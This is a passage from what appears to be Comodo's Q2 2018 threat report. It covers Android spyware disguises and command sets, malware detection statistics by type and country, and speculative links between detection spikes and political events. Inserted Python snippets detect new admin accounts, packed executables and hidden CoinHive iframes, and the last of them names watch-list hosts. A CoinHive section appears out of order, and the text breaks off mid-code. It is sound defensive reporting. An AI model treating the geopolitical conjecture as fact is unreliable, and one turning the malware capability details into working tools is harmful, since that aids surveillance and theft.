Figure: Disguises of Stalker Spy (app and distribution names as shown): FlexiSpy, MBackup, HelloSpy, ProActivator, TActivator, Setting, Wi-Fi Settings, ردیاب اسپای ھاید, Keylogger, System Service, Mobile Spy, 随意代挂, Subway Surfers, 라이브성인방송, Мобильный антивирус, droidgetlogevent, SmartcardService, Cheats Z, CloudAgent, New Insta Follow, Android CJ 대한통운 택배, 余生代挂APP, Basic Daydreams, SystemWifiService, Samplecom, мобильный клиент, Asa刷钻
In addition to the usual must-have spyware feature set, Stalker Spy can remotely turn on the microphone of the infected device to make recordings. This malware is used in three known applications: FlexiSpy, HelloSpy and MobiSpy.
4.1.6 Mystery Bot
The next piece of malware is much more than a spy. The first version of Mystery Bot combines spyware that steals information with a banking trojan that connects to the C&C server of the LokiBot Android banker. The second version of Mystery Bot is ransomware that encrypts files on external storage and deletes the originals after encryption. So we can call it a spy with a "007 licence".
Version 1: Adobe Flash Player
Version 2: Flash Player
Figure: Disguises of Mystery Bot
Mystery Bot comes under the cover of Adobe Flash Player. Below is a list of some of the commands that the malware can execute on your device:
Send_SMS: extract SMS content and send it to the C&C server
Send_USSD: send the USSD to the C&C server
Gethistory: monitor browser history
Start_AllApp: gather information about installed applications
Send_call: set the Intent action to call
Forward_call: forward incoming calls
ResForward_call: reset call forwarding
Go_Smsmnd: delete SMS content
Go_GetAlls: get SMS history
Dell_sms: delete SMS content in a conversation
Send_spam: send spam SMS
Start_Inject: call the injector class
4.1.7 FakeSpy
FakeSpy also wears many masks, as the screenshot shows.
Figure: Disguises of FakeSpy (佐川急便, 현대캐피탈)
It collects available information from the infected device and sends it to its C&C servers. It also checks for the presence of the following banking applications: aucomapp, softbankcomapp, docomocomapp (apps of the Japanese carriers au, SoftBank and docomo).
Here are some of the commands from its Command and Control server:
contacts: get contact details and email ID
Mute: set action to mute
Mms: get MMS content
info: get device information
4.1.8 RedAlert
RedAlert changes multiple "spy legends" to gain users' trust. It wears the masks of popular applications to deceive its victims: Update Flash Player, Viber, WhatsApp, Update WhatsApp, Ebook Reader.
Version 1: EbookReader, Update Flash Player, Android Update, WhatsApp, Viber
Version 2: Update Google Market, Flash Player, Tactic, FlashLight
Figure: Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
de.postbank.finanzassistent
pl.mbank
aib.ibank.android
The second version can also block access to some apps and sites, including Google Chrome, the Google Play store, Gmail and YouTube.
4.1.9 Hero Rat
The next digital spook, Hero Rat, operates mostly in Iran. It uses third-party app stores, social networks and messengers to spread.
Version 1: CloudVPN, MyIrancel, Mtproto, زیـــــبانـــــویس تلگرام ھمھ کاره, Proxy, دوست یاب, Telegram Ton, شارژ رایگان بگیر, App Master, Anti Rat, PlatformA, فالورگیر نامحدود, اینترنت رایگان
Figure: Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it is sold in three tiers: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning such as "app can't be run", but it keeps running in the background and starts spying. It steals text messages, records audio, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get Free Followers and Telegram variants for the Iranian market.
4.1.10 Sonvpay
The next piece of malware, Sonvpay, also wears many masks, but it is more a fraudster than a spy.
Version 1: Caculator-2018, Despacito Ringtone, CaroGame2018, Wifi-Hostpot, Reccoder-Call, QRCodeBar Scanner, APK, Let me love you ringtone, Iphone Ringtone, Night light, Beauty camera-Photo editor, Shape of you ringtone
Figure: Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services, adding extra charges to the owner's mobile bill. Once installed, the malware displays a fake notification with a "skip" option; tapping that button lets the malware start working in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises listed above.
4.1.11 CoinHive
The last entry in our Q2 Android malware list is CoinHive. We mentioned it earlier in the report; here is the version for Android devices. CoinHive for Android comes in three versions, each with more mining capability than the last. It is disseminated via the counterfeit apps listed below, but one of its vectors is especially interesting.
Version 1: Netflix Hack, Instagram Hack
Version 2: TSF Launcher
Version 3: Android Service, PlacarTv Futebol Ao Vivo
Figure: Disguises of CoinHive
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is this possible? Imagine a cybercriminal who wants to infect her victims with a cryptominer to use their resources for cryptocurrency mining. She chooses CoinMiner, downloads it and implants it on the victims' machines. But she is not aware that, earlier, another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too: a thief robbing a thief.
This story neatly illustrates the situation in cybersecurity in Q2: no one can feel totally secure. Even a predator can become prey in seconds.
4.2 Android Malware Catalogued by Month
Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Figure: Android-targeted malware in April
4.2.2 May 2018
Figure: Android-targeted malware in May
4.2.3 June 2018
Figure: Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of the malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections across 237 country-code top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms
A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources, and possibly cause a denial of service. For this Q2 2018 report we place worms in a special category called "Strategic Threat" because of their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms
This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms
A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses the share from a local area network (LAN) or company intranet.
In Q2 2018 Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms
Email worms spread as email attachments or links, and the nastier ones can also travel between victim computers by other means, for example via exploits and autorun functionality.
This quarter the most common Email Worm, by far, was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms
A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without a centralized administrative system. Such networks are commonly used to share files such as unauthorized copies of books and films, and hackers take advantage of this to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects ".exe" and ".scr" files and may use the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home of p2p Worms in Q2 2018.
And this timeline shows that Russia suffered not just one p2p Worm outbreak but many.
5.1.5 IM Worms
Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018 most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of the well-known Yahos IM worm, whose use to spread banking malware via social networks led the FBI to arrest 10 people in 2012.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
Global Threat Report Q2 2018 Edition
Page 46 of 73
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors
A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected for Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses
A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files (HTML) and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans
Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018 Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: in the beginning of June 2018.
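The behavior attributed to Starter above (a new local account that is immediately placed into the Administrators group) leaves a pair of Windows Security log events that a defender can correlate: 4720 (a user account was created) followed shortly by 4732 (a member was added to a security-enabled local group). The Python below is an added example, not code from the report or from Comodo. The event records are constructed and reduced to the fields the correlation needs, the subject names are invented, and the five-minute window is an assumed tuning value.

```python
from datetime import datetime, timedelta

# Constructed, simplified Security-log records (not from the report). Real events
# carry many more fields; only those needed for the correlation are modeled.
# 4720 = user account created, 4732 = member added to a security-enabled local group.
SAMPLE_EVENTS = [
    {"time": "2018-06-04T09:12:01", "id": 4720, "subject": "SVC-BACKUP$", "target": "Remote Service Account"},
    {"time": "2018-06-04T09:12:03", "id": 4732, "subject": "SVC-BACKUP$", "member": "Remote Service Account", "group": "Administrators"},
    {"time": "2018-06-04T10:00:00", "id": 4720, "subject": "helpdesk", "target": "jdoe"},
    {"time": "2018-06-05T08:30:00", "id": 4732, "subject": "helpdesk", "member": "jdoe", "group": "Remote Desktop Users"},
    {"time": "2018-06-05T09:00:00", "id": 4732, "subject": "helpdesk", "member": "jdoe", "group": "Administrators"},
]

# Local groups whose membership changes are worth correlating (assumption; extend
# with domain groups such as Domain Admins in a real deployment).
PRIVILEGED_GROUPS = {"administrators"}


def correlate_new_admin_accounts(events, window=timedelta(minutes=5)):
    """Return one alert per account added to a privileged group after creation.

    An account promoted within `window` of its creation (the Starter pattern) is
    rated high; a promotion long after creation (ordinary helpdesk work) is
    rated low so that it stays visible without drowning the real signal.
    """
    created = {}   # account name -> (creation time, creating subject)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["target"]] = (t, ev["subject"])
        elif ev["id"] == 4732 and ev["group"].lower() in PRIVILEGED_GROUPS:
            hit = created.get(ev["member"])
            if hit is None:
                continue   # pre-existing account; out of scope for this rule
            created_at, creator = hit
            delta = t - created_at
            alerts.append({
                "account": ev["member"],
                "group": ev["group"],
                "created_by": creator,
                "promoted_by": ev["subject"],
                "seconds_between": delta.total_seconds(),
                "severity": "high" if delta <= window else "low",
            })
    return alerts


if __name__ == "__main__":
    for alert in correlate_new_admin_accounts(SAMPLE_EVENTS):
        print(alert)
```

The rule keys on the account name, so it also catches the case where the creating and promoting subjects differ; in production the events would be fed from the Security channel (or a SIEM) rather than from the constructed list.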
5.2.4 Exploits
Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial-of-service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (pdf) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware
In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructor
Constructors are applications that can be used to automatically create malware files.
For Q2 Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2 Germany (de) was the top country of detection for Constructors.
And this timeline shows that Germany not only had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers
Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free, open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018 Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
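Packers leave two signals a defender can check before running a sample: the packer's own section names (UPX0/UPX1 for unmodified UPX) and, because compressed or encrypted data is close to random, high byte entropy in the section that carries the payload. The Python below is an added example, not code from the report or from the UPX project. It walks the PE section table directly, builds constructed minimal PE images (header structures only, not loadable programs) to exercise the checks, and uses 7.0 bits per byte as an assumed entropy threshold. A modified packer such as MUPX may rename its sections, which is why the second constructed sample is caught by entropy alone.

```python
import math
import random
import struct

# Section names that unmodified UPX writes. A modified packer (MUPX) may rename
# them, so this list is only a weak signal on its own.
KNOWN_PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes):
    """Walk the PE section table and return [(name, raw_bytes)]."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    first = coff + 20 + size_opt                          # first IMAGE_SECTION_HEADER
    sections = []
    for i in range(num_sections):
        off = first + i * 40
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        size_raw, ptr_raw = struct.unpack_from("<II", pe, off + 16)
        sections.append((name, pe[ptr_raw:ptr_raw + size_raw]))
    return sections


def assess_packing(pe: bytes, entropy_threshold: float = 7.0):
    """Per-section verdict: known packer section name and/or high entropy."""
    report = []
    for name, data in parse_sections(pe):
        ent = shannon_entropy(data)
        report.append({"name": name, "entropy": round(ent, 2),
                       "known_packer_name": name in KNOWN_PACKER_SECTIONS,
                       "high_entropy": ent >= entropy_threshold})
    return report


def looks_packed(pe: bytes) -> bool:
    return any(s["known_packer_name"] or s["high_entropy"] for s in assess_packing(pe))


def build_minimal_pe(sections):
    """Construct a minimal PE image (DOS stub, COFF header, empty optional
    header) from [(name, raw_bytes)]. For exercising the parser only."""
    headers_end = 0x40 + 4 + 20 + 40 * len(sections)
    ptr, table, body = headers_end, b"", b""
    for name, data in sections:
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ...
        table += struct.pack("<8sIIIIIIHHI", name.encode(), len(data), 0x1000,
                             len(data), ptr, 0, 0, 0, 0, 0x60000020)
        body += data
        ptr += len(data)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    return dos + b"PE\0\0" + coff + table + body


# Constructed samples (seeded so the results are reproducible).
_rng = random.Random(2018)
_random_blob = bytes(_rng.getrandbits(8) for _ in range(4096))   # stands in for compressed payload
PACKED_SAMPLE = build_minimal_pe([("UPX0", b"\0" * 512), ("UPX1", _random_blob)])
RENAMED_PACKED_SAMPLE = build_minimal_pe([(".text", _random_blob)])           # MUPX-style renamed section
PLAIN_SAMPLE = build_minimal_pe([(".text", bytes(range(64)) * 32), (".data", b"hello world\0" * 100)])
```

Entropy alone is not proof of packing (legitimate installers embed compressed resources), so treat a hit as a reason to unpack or sandbox the file rather than as a verdict.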
5.3.3 Email Flooder
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is in fact just what it says: these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information, but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware Applications
In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications
The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical analysis
In this section let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers, but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online. Students collect data for academic papers; spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social activities to business, politics or national security affairs, are mostly performed online. This is especially true during times of national crisis, as both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution was accompanied by Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this argument is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation with a view toward controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was specifically used to disseminate trojan horses, which were then leveraged for some real-world purpose: either to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarus society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart showing Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out that we must consider. Both might be associated with recent electoral incidents. In mid-April Iraq was preparing for a national election, which included a conundrum on how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, there may have been multiple reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day as well as Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in Ukraine's capital city, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations. In that context, this massive spike in malware detection in Croatia on March 28 is interesting, as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's have a look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki. Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected, with the real impact of these attacks being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in delivery method, more sophisticated in persistence and much harder to detect by antivirus software. Propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. With successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of detected trojans in Q2 were information stealers, we can see another dangerous tendency: the accelerating bias of cybercriminals to hunt for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future, creating changes in the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategy, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions, protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe:
The iframe loads the URL shortener
The iframe loads the URL shortener. Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co
And there we can find the familiar link to CoinHive:
The link to CoinHive
What is the impact of this trick? In a simple scenario a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive coopts her computer to mine cryptocoins.
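The trick described above has two observable parts: a base64 string that decodes to markup, and an iframe sized 1x1 so that it never shows on screen. Both can be checked from the page source without executing the script. The Python below is an added example, not code from the report or from Comodo. It looks for iframes in the visible markup and again inside every decodable base64 run, and flags any that are 1x1 (or smaller) or that point at a host on a watch list. The sample page is constructed; only cnhv.co and coinhive.com come from the report, and the rest of the sample (the shortener key, the example.org widget) is invented.

```python
import base64
import re
from html.parser import HTMLParser

# Hosts the report associates with CoinHive: cnhv.co (the URL shortener shown
# above) and coinhive.com. Extend with your own threat intelligence.
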